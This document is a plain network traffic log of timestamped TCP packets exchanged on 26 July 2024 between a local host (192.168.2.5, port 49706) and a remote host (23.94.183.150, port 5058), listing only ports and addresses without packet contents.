Jul 26, 2024 19:26:04.363066912 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363090038 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363091946 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363118887 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363121033 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363146067 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363147020 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363173008 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363197088 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363675117 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363702059 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363729000 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363732100 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.363780022 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363823891 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363858938 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363912106 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363939047 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363965034 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.363991022 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364017010 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364042997 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364068985 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364094973 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364120960 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364146948 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364172935 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364200115 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364226103 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364252090 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364278078 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364303112 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364330053 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364376068 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364402056 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364428043 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364454031 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364495993 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364523888 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364551067 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.364583969 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.365436077 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.365674973 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.365840912 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.366520882 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.366823912 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.366921902 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.366947889 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367038965 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367065907 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367117882 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367201090 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367228031 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367257118 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367312908 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367378950 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367424965 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367477894 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367520094 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367562056 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367609024 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367635012 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367661953 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.367687941 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368216038 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368341923 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368460894 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368530989 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368594885 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368622065 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368690968 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368727922 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368793011 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368819952 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368844986 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368870974 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368916035 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368942976 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.368968964 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369003057 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369043112 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369143963 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369169950 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369204044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369240046 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369266033 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369292021 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369324923 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369364977 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369390965 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369467974 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369494915 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369541883 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369568110 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369594097 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369641066 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369667053 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369693041 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.369914055 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.370050907 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.370727062 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.370862007 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.370946884 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.370974064 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371062040 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371109009 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371155024 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371181011 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371293068 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371351957 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371377945 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371404886 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371431112 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371517897 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371555090 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371604919 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371675014 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371701002 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371809959 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371860027 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.371929884 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372001886 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372046947 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372091055 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372117043 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372163057 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372189999 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372232914 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372267008 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372327089 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372380972 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372407913 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372565985 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372592926 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372620106 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372646093 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372672081 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372698069 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372725010 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372760057 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372801065 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372827053 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372853041 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372879028 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372905970 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372932911 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.372960091 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373006105 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373032093 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373058081 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373084068 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373110056 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373136044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373162985 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.373400927 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.373544931 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.374902964 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375005007 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375056028 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375102997 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375205040 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375236988 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375304937 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375332117 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375358105 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375392914 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375524044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375603914 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375638962 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375674963 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375740051 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375783920 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375828028 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375875950 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375902891 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375965118 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.375998020 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376044989 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376081944 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376126051 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376172066 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376199007 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376225948 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376251936 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376277924 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376305103 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376331091 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376358032 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376384020 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376409054 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376435995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376461983 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376507044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376533031 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376559019 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.376585007 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378120899 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378158092 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378204107 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378237009 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378293037 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378335953 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378381968 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378407955 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378500938 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378520966 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378532887 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378545046 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378557920 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378617048 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378637075 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378644943 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378699064 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378747940 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378793955 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378801107 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378812075 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.378911972 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378918886 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.378967047 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.379061937 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379070044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379080057 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379093885 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379101038 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379106998 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379113913 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379121065 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379128933 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379136086 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379179001 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379187107 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379228115 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379235029 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379271984 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379292965 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379301071 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379343987 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379350901 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379354000 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379379988 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379456043 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379467010 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379473925 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379482985 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379489899 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379523039 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379601002 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379610062 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379616022 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379647970 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379656076 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379698038 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379771948 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379966974 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379973888 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379981041 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379983902 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379992008 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.379997969 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.380001068 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.380007029 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.380083084 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.380090952 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.380103111 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.383949995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384164095 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.384263992 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384303093 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.384346962 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384545088 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384577036 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384609938 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384660006 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384669065 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384675980 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384692907 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384701967 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384731054 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384848118 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384855032 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384862900 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384917021 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384968996 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384989023 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.384998083 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385006905 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385014057 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385032892 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385057926 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385066032 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385124922 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385158062 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385165930 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385381937 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385423899 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385488033 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385497093 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385529995 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385591984 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385600090 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385633945 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385710955 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.385719061 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386022091 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386030912 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386044025 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386053085 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386060953 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386065006 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386066914 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386074066 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386081934 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386090040 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386097908 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386104107 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386111975 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386118889 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386409044 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.386419058 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389086008 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389275074 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389305115 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389339924 CEST	49706	5058	192.168.2.5	23.94.183.150
Jul 26, 2024 19:26:04.389419079 CEST	5058	49706	23.94.183.150	192.168.2.5
Jul 26, 2024 19:26:04.389435053 CEST	5058	49706	23.94.183.150	192.168.2.5
